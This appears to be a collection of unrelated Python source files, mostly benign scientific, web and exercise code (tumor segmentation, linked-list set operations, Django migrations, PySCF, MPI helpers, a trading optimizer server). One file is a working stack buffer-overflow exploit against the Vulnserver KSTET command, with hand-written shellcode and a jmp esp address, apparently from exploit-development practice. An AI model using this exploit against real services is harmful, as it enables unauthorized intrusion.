plt.imshow(np.argmax(mean, axis = -1).reshape((240, 240)), vmin = 0., vmax = 3.)
plt.show()
plt.figure(figsize = (8, 8))
plt.imshow(np.mean(var[:, :, :, 1:], axis = -1).reshape((240, 240)))
plt.colorbar()
plt.show()
if __name__ == '__main__':
test_image, gt = load_vol(test_path[0])
model = load_model('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes_MC.h5')
model.load_weights('/home/parth/Interpretable_ML/Brain-tumor-segmentation/checkpoints/Unet_MC/UnetRes.60_1.066.hdf5', by_name = True)
D = Test_Time_Augmentation()
D.predict_aleatoric(model_res, test_image, iterations = 100, dropout = 0.)
|
python
|
class Node:
def __init__(self, value):
self.value = value
self.next = None
def __repr__(self):
return str(self.value)
class LinkedList:
def __init__(self):
self.head = None
def __str__(self):
cur_head = self.head
out_string = ""
while cur_head:
out_string += str(cur_head.value) + " -> "
cur_head = cur_head.next
return out_string
def append(self, value):
if self.head is None:
self.head = Node(value)
return
node = self.head
while node.next:
node = node.next
node.next = Node(value)
def pop(self):
if self.head is None:
return None
node = self.head
self.head = self.head.next
return node
def size(self):
size = 0
node = self.head
while node:
size += 1
node = node.next
return size
def union(llist_1, llist_2):
union_set = set()
output = LinkedList()
while llist_1.head is not None:
union_set.add(llist_1.pop().value)
while llist_2.head is not None:
union_set.add(llist_2.pop().value)
for num in union_set:
output.append(num)
return output
def intersection(llist_1, llist_2):
l1_set = set()
l2_set = set()
intersection = set()
output = LinkedList()
while llist_1.head is not None:
l1_set.add(llist_1.pop().value)
while llist_2.head is not None:
l2_set.add(llist_2.pop().value)
for elem in l1_set:
if elem in l2_set:
intersection.add(elem)
for num in intersection:
output.append(num)
return output
# Union test case 1 - union exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]
element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 9, 11, 21, 32, 35, 65]
for i in element_1:
linked_list_1.append(i)
for j in element_2:
linked_list_2.append(j)
output = union(linked_list_1, linked_list_2)
output_list = []
while output.head:
output_list.append(output.pop().value)
output_list.sort()
if output_list == solution:
print("Test case 1 union: Pass!")
else:
print("Test case 1 union: FAIL.")
# Intersection test case 1 - intersection exists
linked_list_1 = LinkedList()
linked_list_2 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21]
element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1]
solution = [4, 6, 21]
for i in element_1:
linked_list_1.append(i)
for j in element_2:
linked_list_2.append(j)
output = intersection(linked_list_1, linked_list_2)
output_list = []
while output.head:
num = output.pop().value
output_list.append(num)
if sorted(output_list) == solution:
print("Test case 1 intersection: Pass!")
else:
print("Test case 1 intersection: FAIL.")
# Union test case 2 - union exists
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]
element_2 = [1, 7, 8, 9, 11, 21, 1]
solution = [1, 2, 3, 4, 6, 7, 8, 9, 11, 21, 23, 35, 65]
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 2 union: Pass!")
else:
print("Test case 2 union: FAIL.")
# Intersection test case 2 - intersection does not exist
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23]
element_2 = [1, 7, 8, 9, 11, 21, 1]
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = intersection(linked_list_1, linked_list_2)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 2 intersection: Pass!")
else:
print("Test case 2 intersection: FAIL.")
# Union test case 3 - union of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = []
element_2 = []
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = union(linked_list_3, linked_list_4)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 3 union: Pass!")
else:
print("Test case 3 union: FAIL.")
# Intersection test case 3 - intersection of empty sets
linked_list_3 = LinkedList()
linked_list_4 = LinkedList()
element_1 = []
element_2 = []
solution = []
for i in element_1:
linked_list_3.append(i)
for i in element_2:
linked_list_4.append(i)
output = intersection(linked_list_1, linked_list_2)
output_list = []
while output.head:
output_list.append(output.pop().value)
if sorted(output_list) == solution:
print("Test case 3 intersection: Pass!")
else:
print("Test case 3 intersection: FAIL.")
|
python
|
# Generated by Django 2.2.12 on 2020-07-18 19:09
import ckeditor.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0019_order_refrence_code'),
]
operations = [
migrations.AlterField(
model_name='historicalitem',
name='additional_info',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='historicalitem',
name='description',
field=ckeditor.fields.RichTextField(),
),
migrations.AlterField(
model_name='item',
name='additional_info',
field=ckeditor.fields.RichTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='item',
name='description',
field=ckeditor.fields.RichTextField(),
),
]
|
python
|
import unittest
import math_module
class TestMath(unittest.TestCase):
def setUp(self):
self.zir = math_module.Analysis('test_zircon', 15, (0.2003, 0.0008, 0.0046), (2.082, 0.009, 0.07), 0.6, 0.6,
(0.0617, 0.0003, 0.0003), (0.758, 0.0003, 0.0015), (0, 0, 0), (0, 0, 0), (0, 0, 0),
(0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), 1)
def tearDown(self):
pass
def test_calc_ratio(self):
result = math_module.calc_ratio(1000)[0]
self.assertEqual(result, 0.16780392747297124)
def test_analysis(self):
self.assertEqual(round(self.zir.calc_age(0)[0], 0), 1177)
if __name__ == '__main__':
unittest.main()
|
python
|
PATHS = dict(
REPOS_FILE = 'config/repos.json',
DAILY_REPORTS_PATH = 'reports/daily',
WEEKLY_REPORTS_PATH = 'reports/weekly'
)
|
python
|
from django.contrib import admin
from ddweb.apps.references.models import Reference
class ReferenceAdmin(admin.ModelAdmin):
list_display = (
"ship",
"year",
"description",
"ongoing",
"beforeDD",
"image_admin_url",
)
def image_admin_url(self, obj):
return '<a href="/images/uploadf/reference/%s">Upload images</a>' % obj.id
image_admin_url.allow_tags = True
admin.site.register(Reference, ReferenceAdmin)
|
python
|
#!/usr/bin/env python
import numpy
import numpy.linalg
from pyscf import gto, scf, mcscf
mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr',
basis='ccpvtz')
#
# A regular SCF calculation for this sytem will raise a warning message
#
# Warn: Singularity detected in overlap matrix (condition number = 5.47e+09). SCF may be inaccurate and hard to converge.
#
# The linear dependency can cause HF, MCSCF etc methods converging to wrong
# answer. This example shows how to remove linear dependency from overlap
# matrix and use the linearly independent basis in the HF, MCSCF calculations.
#
# There is a shortcut function to remove linear-dependency, eg
#
# mf = scf.RHF(mol).apply(scf.addons.remove_linear_dep_)
#
# This example demonstrated how the linear dependency is removed in our
# implementation.
#
#
# The smallest eigenvalue of overlap matrix is 10^{-9}
#
s = mol.intor('cint1e_ovlp_sph')
print(numpy.linalg.eigh(s)[0][:8])
#[ 1.96568587e-09 8.58358923e-08 7.86870520e-07 1.89728026e-06
# 2.14355169e-06 8.96267338e-06 2.46812168e-05 3.26534277e-05]
def eig(h, s):
d, t = numpy.linalg.eigh(s)
# Removing the eigenvectors assoicated to the smallest eigenvalue, the new
# basis defined by x matrix has 139 vectors.
x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
xhx = reduce(numpy.dot, (x.T, h, x))
e, c = numpy.linalg.eigh(xhx)
c = numpy.dot(x, c)
# Return 139 eigenvalues and 139 eigenvectors.
return e, c
#
# Replacing the default eig function with the above one, the HF solver
# generate only 139 canonical orbitals
#
mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()
#
# The CASSCF solver takes the HF orbital as initial guess. The MCSCF problem
# size is (0 core, 10 active, 129 external) orbitals. This information can be
# found in the output.
#
mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()
#
# For symmetry adapted calculation, similar treatments can be applied.
#
# Here by assigning symmetry=1, mol.irrep_name, mol.irrep_id and mol.symm_orb
# (see pyscf/gto/mole.py) are initialized in the mol object. They are the
# irrep symbols, IDs, and symmetry-adapted-basis.
#
mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr',
basis='ccpvtz', symmetry=1)
#
# The smallest eigenvalue is associated to A1u irrep. Removing the relevant
# basis will not break the symmetry
#
s = mol.intor('cint1e_ovlp_sph')
for i, c in enumerate(mol.symm_orb):
s1 = reduce(numpy.dot, (c.T, s, c))
print(mol.irrep_name[i], numpy.linalg.eigh(s1)[0])
#A1g [ 8.58358928e-08 2.14355169e-06 2.46812168e-05 3.26534277e-05
#...
#E1gx [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03
#...
#E1gy [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03
#...
#A1u [ 1.96568605e-09 7.86870519e-07 1.89728026e-06 8.96267338e-06
#...
# pyscf/scf/hf_symm.py
def eig(h, s):
from pyscf import symm
nirrep = len(mol.symm_orb)
h = symm.symmetrize_matrix(h, mol.symm_orb)
s = symm.symmetrize_matrix(s, mol.symm_orb)
cs = []
es = []
#
# Linear dependency are removed by looping over different symmetry irreps.
#
for ir in range(nirrep):
d, t = numpy.linalg.eigh(s[ir])
x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8])
xhx = reduce(numpy.dot, (x.T, h[ir], x))
e, c = numpy.linalg.eigh(xhx)
cs.append(reduce(numpy.dot, (mol.symm_orb[ir], x, c)))
es.append(e)
e = numpy.hstack(es)
c = numpy.hstack(cs)
return e, c
mf = scf.RHF(mol)
mf.eig = eig
mf.verbose = 4
mf.kernel()
mc = mcscf.CASSCF(mf, 10, 10)
mc.verbose = 4
mc.kernel()
|
python
|
from numpy import prod
def persistence(n):
if n < 10: return 0
nums = [int(x) for x in str(n)]
steps = 1
while prod(nums) > 9:
nums = [int(x) for x in str(int(prod(nums)))]
steps += 1
return steps
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import socket
from time import sleep
from struct import *
host= "172.30.200.66"
port = 9999
payload = ""
# Estagio 2 -> Realinhamento da pilha para encontrar o FileDescriptor
payload += "\x54" # push esp
payload += "\x59" # pop ecx
payload += "\x66\x81\xE9\x44\x01" # sub cx,0x144
# Reajusta a posição de ESP
# como o ESP (pilha) está abaixo deste payload, iremos reajustar para uma posição acima
payload += "\x83\xEC\x50" # sub esp 50
# Estagio 3 -> Calcular parametros do recv
# int recv( SOCKET s, char *buf, int len, int flags );
# Adiciona o 4 parametro (flags)
payload += "\x31\xC0" # xor eax,eax --> Zera EAX
payload += "\x50" # push eax
# Adiciona o 3 parametro (int)
payload += "\x31\xC0" # xor eax,eax --> Zera EAX
payload += "\xB0\x08" # mov al,0x8
payload += "\xB4\x02" # mov ah,0x2
payload += "\x50" # push eax --> EAX deve ter o valor 0x00000208 decimal 520
# Adiciona o 2 parametro (*buf), ou seja endereço do Buffer
payload += "\x54" # push esp
payload += "\x5A" # pop edx
payload += "\x83\xC2\x50" # ADD EDX, 50
payload += "\x52" # push edx
# Adiciona o 1 parametro (socket)
payload += "\xFF\x31" # PUSH DWORD PTR DS:[ECX]
payload += "\xCC" # Breakpoint
payload += "\x90" * (66 - len(payload)) # preenche com NOPs
payload += pack('<L',0x625011af) # 0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (essfunc.dll)
# Estagio 1 -> JMP para o inicio do nosso payload (AAAA...)
payload += "\x54" # push esp
payload += "\x5A" # pop edx
payload += "\x83\xEA\x46" # sub edx,byte +0x46
payload += "\xFF\xE2" # jmp edx
buffer = b"KSTET /.:/"
buffer += payload
shellcode = "E" * 520
print "[*] Enviando requisicao maliciosa ... :)"
exp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp.connect((host,port))
exp.recv(4096)
exp.send(buffer)
exp.close()
|
python
|
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
import numpy as np
################################################################################
###
### USAGE
### list_of_objects = parutil.init(list_of_object)
### ### DO WHAT YOU WANT
### list_of object = parutil.finish(list_of_objects)
###
################################################################################
def init(iterable):
iterable = scatter(iterable)
return iterable
def finish(iterable, barrier=True):
iterable = bcast(gather(iterable))
if barrier: comm.Barrier()
return iterable
def scatter(iterable):
"""Scatter iterable as chunks to the cores.
N.B.: len(iterable) == size after scattering!"""
iterable = comm.scatter(chop(iterable))
return iterable
def gather(iterable, keep_order=True, keep_type=True):
iterable = comm.gather(iterable)
if rank == 0:
itertype = type(iterable)
iterable = sum(iterable,[])
if keep_order:
natural = range(len(iterable))
mixed = chop(natural)
try:
mixed = sum(mixed,[])
except TypeError:
### list elements are generators!
mixed = [list(i) for i in mixed]
mixed = sum(mixed,[])
order = np.argsort(mixed)
iterable = np.array(iterable)[order]
if keep_type == True:
if itertype in [list, tuple, set, frozenset]:
iterable = itertype(iterable)
elif itertype is not np.ndarray:
raise NotImplementedError("NOT TESTED")
return iterable
def bcast(iterable):
iterable = comm.bcast(iterable)
return iterable
def chop(iterable):
"""Chop an iterable into (quasi)-equally long chunks.
Automatically handle non-multiplier! ( len(iterable)%size != 0 )
Core function for parallelization"""
chunks = [iterable[i::size] for i in range(size)]
return chunks
|
python
|
#!/usr/bin/env python
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", type=str, help="database file input")
parser.add_argument("-o", "--output", type=str, help="filtered fasta output")
parser.add_argument("-k", "--keyword", type=str, help="filter records to include keyword")
args = parser.parse_args()
rec_dict = {}
with open(args.input, "r") as ifile:
line = ifile.readline()
while line != "":
header = line
line = ifile.readline()
seq = ""
while line != "" and line[0] != ">":
seq += line.strip()
line = ifile.readline()
rec_dict[header] = seq
with open(args.output, "w") as ofile:
for rec in rec_dict.keys():
if args.keyword in rec:
ofile.write(F"{rec}{rec_dict[rec]}\n")
|
python
|
# PyAlgoTrade
#
# Copyright 2011-2018 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <[email protected]>
"""
import threading
import time
from six.moves import xmlrpc_server
import pyalgotrade.logger
from pyalgotrade.optimizer import base
from pyalgotrade.optimizer import serialization
logger = pyalgotrade.logger.getLogger(__name__)
class AutoStopThread(threading.Thread):
def __init__(self, server):
super(AutoStopThread, self).__init__()
self.__server = server
def run(self):
while self.__server.jobsPending():
time.sleep(1)
self.__server.stop()
class Job(object):
def __init__(self, strategyParameters):
self.__strategyParameters = strategyParameters
self.__bestResult = None
self.__bestParameters = None
self.__id = id(self)
def getId(self):
return self.__id
def getNextParameters(self):
ret = None
if len(self.__strategyParameters):
ret = self.__strategyParameters.pop()
return ret
# Restrict to a particular path.
class RequestHandler(xmlrpc_server.SimpleXMLRPCRequestHandler):
rpc_paths = ('/PyAlgoTradeRPC',)
class Server(xmlrpc_server.SimpleXMLRPCServer):
def __init__(self, paramSource, resultSinc, barFeed, address, port, autoStop=True, batchSize=200):
assert batchSize > 0, "Invalid batch size"
xmlrpc_server.SimpleXMLRPCServer.__init__(
self, (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
)
# super(Server, self).__init__(
# (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True
# )
self.__batchSize = batchSize
self.__paramSource = paramSource
self.__resultSinc = resultSinc
self.__barFeed = barFeed
self.__instrumentsAndBars = None # Serialized instruments and bars for faster retrieval.
self.__barsFreq = None
self.__activeJobs = {}
self.__lock = threading.Lock()
self.__startedServingEvent = threading.Event()
self.__forcedStop = False
self.__bestResult = None
if autoStop:
self.__autoStopThread = AutoStopThread(self)
else:
self.__autoStopThread = None
self.register_introspection_functions()
self.register_function(self.getInstrumentsAndBars, 'getInstrumentsAndBars')
self.register_function(self.getBarsFrequency, 'getBarsFrequency')
self.register_function(self.getNextJob, 'getNextJob')
self.register_function(self.pushJobResults, 'pushJobResults')
def getInstrumentsAndBars(self):
return self.__instrumentsAndBars
def getBarsFrequency(self):
return str(self.__barsFreq)
def getNextJob(self):
ret = None
with self.__lock:
# Get the next set of parameters.
params = [p.args for p in self.__paramSource.getNext(self.__batchSize)]
# Map the active job
if len(params):
ret = Job(params)
self.__activeJobs[ret.getId()] = ret
return serialization.dumps(ret)
def jobsPending(self):
if self.__forcedStop:
return False
with self.__lock:
jobsPending = not self.__paramSource.eof()
activeJobs = len(self.__activeJobs) > 0
return jobsPending or activeJobs
def pushJobResults(self, jobId, result, parameters, workerName):
jobId = serialization.loads(jobId)
result = serialization.loads(result)
parameters = serialization.loads(parameters)
# Remove the job mapping.
with self.__lock:
try:
del self.__activeJobs[jobId]
except KeyError:
# The job's results were already submitted.
return
if self.__bestResult is None or result > self.__bestResult:
logger.info("Best result so far %s with parameters %s" % (result, parameters))
self.__bestResult = result
self.__resultSinc.push(result, base.Parameters(*parameters))
def waitServing(self, timeout=None):
return self.__startedServingEvent.wait(timeout)
def stop(self):
self.shutdown()
def serve(self):
assert len(self.__barFeed.getAllFrequencies()) == 1
try:
# Initialize instruments, bars and parameters.
logger.info("Loading bars")
loadedBars = []
for dateTime, bars, freq in self.__barFeed:
loadedBars.append(bars)
instruments = self.__barFeed.getRegisteredInstruments()
self.__instrumentsAndBars = serialization.dumps((instruments, loadedBars))
self.__barsFreq = self.__barFeed.getAllFrequencies()[0]
if self.__autoStopThread:
self.__autoStopThread.start()
logger.info("Started serving")
self.__startedServingEvent.set()
self.serve_forever()
logger.info("Finished serving")
if self.__autoStopThread:
self.__autoStopThread.join()
finally:
self.__forcedStop = True
|
python
|
"""
Custom SCSS lexer
~~~~~~~~~~~~~~~~~
This is an alternative to the Pygments SCSS lexer
which is broken.
Note, this SCSS lexer is also broken, but just a bit less
broken.
"""
import re
from pygments.lexer import ExtendedRegexLexer
from pygments.lexers.css import (
bygroups, copy, Comment, default, include, iteritems, Keyword,
Name, Operator, Punctuation, String, Text)
from pygments.lexers.css import ScssLexer as DefaultScssLexer
class ScssLexer(ExtendedRegexLexer):
"""
For SCSS stylesheets.
"""
name = 'SCSS2'
aliases = ['scss2']
filenames = ['*.scss']
mimetypes = ['text/x-scss']
flags = re.IGNORECASE | re.DOTALL
def selector_callback(self, match, ctx):
ctx.pos = match.start()
stack = ctx.stack
ctx.stack = ['selector']
analyses = []
try:
for pos, token, text in self.get_tokens_unprocessed(context=ctx):
analyses.append((pos, token, text))
except IndexError:
pass
text = ''.join(analysis[-1] for analysis in analyses).strip()
if text and text[-1] in ';}':
analyses = []
ctx.pos = match.start()
ctx.stack = ['attribute']
try:
for pos, token, text in self.get_tokens_unprocessed(context=ctx):
analyses.append((pos, token, text))
except IndexError:
pass
for pos, token, text in analyses:
yield pos, token, text
ctx.stack = stack
ctx.pos = pos + len(text)
tokens = {}
for group, common in iteritems(DefaultScssLexer.tokens):
tokens[group] = copy.copy(common)
tokens['root'] = [
(r'\s+', Text),
(r'//.*?\n', Comment.Single),
(r'/\*.*?\*/', Comment.Multiline),
(r'@import', Keyword, 'value'),
(r'@for', Keyword, 'for'),
(r'@if', Keyword, 'condition'),
(r'@while', Keyword, 'condition'),
(r'@else', Keyword),
(r'@(debug|warn|if|while)', Keyword, 'value'),
(r'(@mixin)( [\w-]+)', bygroups(Keyword, Name.Function), 'value'),
(r'(@include)( [\w-]+)', bygroups(Keyword, Name.Decorator), 'value'),
(r'@extend', Keyword, 'selector'),
(r'(@media)(\s+)', bygroups(Keyword, Text), 'value'),
(r'@[\w-]+', Keyword, 'selector'),
(r'(\$[\w-]*\w)([ \t]*:)', bygroups(Name.Variable, Operator), 'value'),
(r'[{}]', Punctuation),
(r'[\w\.#]', selector_callback),
]
tokens['selector'] = [
(r'[ \t]+', Text),
(r'\:', Name.Decorator, 'pseudo-class'),
(r'\.', Name.Class, 'class'),
(r'#\{', String.Interpol, 'interpolation'),
(r'\#', Name.Namespace, 'id'),
(r'[\w-]+', Name.Tag),
(r'[~^*!&\[\]()<>|+=@:./?-]', Operator),
(r'"', String.Double, 'string-double'),
(r"'", String.Single, 'string-single'),
(r'[,{;]', Punctuation, '#pop')
]
tokens['attribute'] = [
(r'\s+', Text),
(r'[\w-]+', Name.Attribute),
(r'#\{', String.Interpol, 'interpolation'),
(r'[:]', Operator, 'value'),
(r'\}', Punctuation, '#pop')
]
tokens['condition'] = [
(r'[!%()<>+=-]', Operator),
include('value'),
default('#pop')]
tokens['else'] = [('if', Keyword, 'condition'), default('#pop')]
tokens['value'].append((r'\$[\w-]', Name.Variable))
tokens['value'].append((r'}', Punctuation, '#pop'))
tokens['pseudo-class'] = [
(r'[\w-]+', Name.Decorator),
(r'#\{', String.Interpol, 'interpolation'),
include('value'),
default('#pop'),
]
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Create a fastq file from fasta file with fake quality values all equal.
"""
import sys
from Bio import SeqIO
# Get inputs
fa_path = sys.argv[1]
fq_path = sys.argv[2]
# Make fastq
with open(fa_path, "rb") as fasta, open(fq_path, "wb") as fastq:
for record in SeqIO.parse(fasta, "fasta"):
record.letter_annotations["phred_quality"] = [40] * len(record)
SeqIO.write(record, fastq, "fastq")
|
python
|
from Common import *
import os
photos = set()
async def save_photo(photo):
id = photo.id
if id not in photos:
await bot.download_media(photo, get_path(id))
photos.add(id)
return get_path(id)
def rename_to_id(name, id):
os.rename(get_path(name), get_path(id))
photos.add(id)
def get_id(path):
return os.path.splitext(os.path.basename(path))[0]
def get_path(name):
name = str(name)
if name.startswith(os.path.join('tmp', '')):
return name
return os.path.join('tmp', name + '.jpg')
def clear_tmp():
photos.clear()
for filename in os.listdir('tmp'):
os.remove(os.path.join('tmp', filename))
def fix_tmp():
if not os.path.exists('tmp'):
os.mkdir('tmp')
if len(os.listdir('tmp')) > 200:
clear_tmp()
|
python
|
from beem import Steem
stm = Steem()
print(stm.get_config(1)["STEEMIT_MAX_PERMLINK_LENGTH"])
print(stm.get_config()["STEEMIT_MIN_PERMLINK_LENGTH"])
|
python
|
from http.server import HTTPServer, SimpleHTTPRequestHandler, BaseHTTPRequestHandler
from zipreport.cli.debug.server import DebugServer
class DebugServerHandler(BaseHTTPRequestHandler):
def __init__(self, *args, report=None, **kwargs):
self._report = report
super().__init__(*args, **kwargs)
def do_GET(self):
self.send_response(200)
self.end_headers()
print(self.path)
print("Received:", self.command, self.path)
self.wfile.write(b'Hello, world!')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
response = BytesIO()
response.write(b'This is POST request. ')
response.write(b'Received: ')
response.write(body)
self.wfile.write(response.getvalue())
#server_address = ('', 8000)
#httpd = HTTPServer(server_address, DebugServerHandler)
#httpd.report = "tadaa"
#httpd.serve_forever()
server = DebugServer()
server.run('./examples/reports/newsletter')
|
python
|
# Generated by Django 3.2.7 on 2021-11-23 16:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('blog', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='comment',
name='user_comment',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comment', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AddField(
model_name='blog',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.category', verbose_name='Category'),
),
]
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Copyright (c) 2021 Scott Weaver
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Calculate the distance between two concentric ellipses, one of which has been rotated.
"""
import os
import sys
import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
# ----------
# Default values
# a is the radius along the x-axis (sometimes shown as h)
# b is the radius along the y-axis (sometimes shown as v)
# first (the outside) ellipse
a1=6.5
b1=6.0
# second (inner) rotated ellipse
a2=6.0
b2=5.0
# angles
T=20 # inner ellipse rotation angle
lT=T # line of intersection angle
# ----------
# check for obvious issues
def check_for_issues():
if T == 90 and a2 == b1:
sys.stderr.write("WARNING: " +
"The horizontal and vertical radii are equal and " +
"will result in a divide by zero runtime error." + os.linesep)
# ----------
# Calculate y for a line passing through x at an angle t.
# This is for a line passing through the origin (0, 0).
# The angle t is in degrees.
def get_position_y_at_angle(x, t):
trad = math.radians(t)
return math.tan(trad)*x
def get_position_x_at_angle(y, t):
trad = math.radians(t)
return y / math.tan(trad)
# ----------
# rational representation: https://en.wikipedia.org/wiki/Ellipse
# This method was used just for fun.
# a: horizontal radius
def get_ellipse_x_rational(u, a):
x = a * (1 - u**2) / (u**2 + 1)
return x
# b: vertical radius
def get_ellipse_y_rational(u, b):
y = (2*b*u) / (u**2 + 1)
return y
# ----------
# Standard parametric representation: https://en.wikipedia.org/wiki/Ellipse
def get_ellipse_x_standard(t, a):
return a * (math.cos(math.radians(t)))
def get_ellipse_y_standard(t, b):
return b * (math.sin(math.radians(t)))
# ----------
# rotate ellipse
def get_ellipse_x_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
x = (a * math.cos(trad) * math.cos(rrad)) - (b * math.sin(trad) * math.sin(rrad))
return x
def get_ellipse_y_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
y = (a * math.cos(trad) * math.sin(rrad)) + (b * math.sin(trad) * math.cos(rrad))
return y
# ----------
# The intersection of a line and an ellipse
def get_line_ellipse_x_intercept_standard(t, a, b):
# trad = math.radians(t)
# n=a**2 * b**2
# d=b**2 + (a**2 * math.tan(trad)**2)
# x = math.sqrt(n/d)
# # make sure we're in the right quadrant
# if lT > 90 and lT < 270:
# x*=-1
# return x
return get_line_ellipse_x_intercept_rotated(t, a, b, 0)
# ----------
# The intersection of line and rotated ellipse (at the origin)
# http://quickcalcbasic.com/ellipse%20line%20intersection.pdf
def get_line_ellipse_x_intercept_rotated(t, a, b, r):
trad = math.radians(t)
rrad = math.radians(r)
m = math.tan(trad)
if t == 90 or r == 270:
x = get_line_ellipse_y_intercept_rotated(t, a, b, r, 0)
else:
A = b**2 * (math.cos(rrad)**2 + 2 * m * math.cos(rrad) * math.sin(rrad) + m**2 * math.sin(rrad)**2) \
+ a**2 * (m**2 * math.cos(rrad)**2 - 2 * m * math.cos(rrad) * math.sin(rrad) + math.sin(rrad)**2)
B = 0 # all drops out b/c b1=0 in y=mx+b1
C = -1 * a**2 * b**2
# quadratic eq.
x = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
# make sure we're in the correct quadrant
if lT > 90 and lT <= 270:
x*=-1
return x
# ---------
def get_line_ellipse_y_intercept_rotated(t, a, b, r, x):
rrad = math.radians(r)
A = b**2 * math.sin(rrad)**2 + a**2 * math.cos(rrad)**2
B = 2 * x * math.cos(rrad) * math.sin(b**2 - a**2)
C = x**2 * (b**2 * math.cos(rrad)**2 + a**2 * math.sin(rrad)**2) - a**2 * b**2
# quadratic eq.
y = (-1 * B + math.sqrt(B**2 - 4 * A * C)) / (2 * A)
return get_position_x_at_angle(y, t)
# --------
def main():
check_for_issues()
# setup the plot
plt.figure(figsize=(8, 5))
gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])
ax0 = plt.subplot(gs[0])
ax1 = plt.subplot(gs[1])
ax0.set_title("Concentric Ellipses")
ax1.set_title("Distance between Ellipses")
ax1.set_xlabel("Degrees")
ax0.set_xlim(-1*(a1+1), a1+1)
ax0.set_ylim(-1*(b1+1), b1+1)
# plot a line at set angle
vect_get_position_y_at_angle = np.vectorize(get_position_y_at_angle, excluded='x')
x1 = np.arange(-1*a1, a1+1, 1.0)
ax0.plot(x1, vect_get_position_y_at_angle(x1, lT), color='red')
# Display the second (inner) ellipse before it's rotated (just for fun)
u = np.arange(-1000, 1000, 0.1)
ax0.plot(get_ellipse_x_rational(u, a2), get_ellipse_y_rational(u, b2), color='lightgray')
# plot the first ellipse (not rotated)
